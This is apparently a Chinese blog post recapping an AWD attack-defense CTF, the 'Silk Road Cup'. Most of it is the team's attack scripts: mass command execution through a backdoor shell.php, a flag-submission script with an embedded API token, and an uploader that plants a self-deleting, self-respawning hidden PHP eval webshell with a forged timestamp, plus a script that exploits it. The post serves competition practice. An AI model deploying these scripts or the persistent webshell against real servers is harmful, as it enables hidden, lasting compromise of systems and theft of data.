这是一个对丝路杯的总结,主要是awd攻防。从这次比赛中找到不足。(之后有补充的话会继续补充)
这次的check很抽象,检测你有没有修改后门文件,修改了,直接异常,只能删除后门文件(无异常)。而且对通防没有限制,虽说文件里明确说明了,但是裁判和技术人员居然不知道规则,现场查看规则。靶机没有重置功能,但文件里说有
我们是第一个找到后门文件的,拿到了一血,但脚本没准备好,是现场手搓的,导致awd惨不忍睹。
下面是代码:
得到flag并写入文件的代码
import requestsips = open("./ip.txt","r")
url = "/shell.php"for ip in ips:urlip = ip.strip()+urldata={"shell":"system('cat /flag')"}try:response = requests.post(url=urlip, data=data, timeout=3)if "flag" in response.text:print("Found flag:", response.text)with open("flag.txt", "a") as file:file.write(response.text + "\n")except requests.RequestException as e:print(f"Error requesting {urlip}: {e}")ips.close()
批量提交flag的代码:
import requestsurl = "http://democtf.yanwuting.cn/api/v1/awd/answer?evt=acefcc4d-a9cb-4d4a-a75d-7fb7fea5018e"
token = "1792049566158509911"with open("flag.txt","r") as flags:for flag in flags:flag = flag.strip()# 构造请求数据data = {"flag": flag,"token": token}try:# 发送POST请求response = requests.post(url, data=data, timeout=3)# 打印提交结果print(f"提交flag: {flag},响应状态码: {response.status_code},响应内容: {response.text}")except requests.exceptions.RequestException as e:print(f"提交flag: {flag} 时发生错误: {e}")
上传不死马代码:
import requests
import base64ips = open("./ip.txt", "r")
url_suffix = "/shell.php"# 要上传的文件内容
file_content = '''<?phpignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '.kangkang.php';$code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e832627b4f6"){@eval($_POST["cmd"]);} ?>';while (1){file_put_contents($file,$code);system('touch -m -d "2018-12-01 09:10:12" .kangkang.php');usleep(1);}
?>'''# 将内容进行base64编码,避免特殊字符问题
encoded_content = base64.b64encode(file_content.encode()).decode()for ip in ips:ip = ip.strip()if not ip:continueurlip = ip + url_suffixprint("Testing:", urlip)# 使用base64解码并写入文件data = {"shell": f"echo '{encoded_content}' | base64 -d > /var/www/html/.kangkang.php"}try:response = requests.post(url=urlip, data=data, timeout=5)print("Upload response:", response.text)# 验证文件是否上传成功verify_data = {"shell": "ls -la /var/www/html/.kangkang.php && cat /var/www/html/.kangkang.php | head -5"}verify_response = requests.post(url=urlip, data=verify_data, timeout=5)if ".kangkang.php" in verify_response.text:print("File uploaded successfully!")url2 = ip+".kangkang.php"response2 = requests.get(url=url2, timeout=5)print(response2.status_code)except requests.RequestException as e:print(f"Error requesting {urlip}: {e}")ips.close()
利用不死马
import requestswith open("ip.txt","r") as ips:for ip in ips:url=ip.strip()+"/.kangkang.php?pass=test"data={"cmd":"system('cat /flag')"}try:response = requests.post(url=url, data=data, timeout=3)if "flag" in response.text:print(f"Found flag at {ip}: {response.text}")with open("flag.txt", "a") as file:file.write(response.text + "\n")else:print(f"No flag found at {ip}, response: {response.text[:100]}...") # 只显示前100个字符except requests.RequestException as e:print(f"Error requesting {url}: {e}")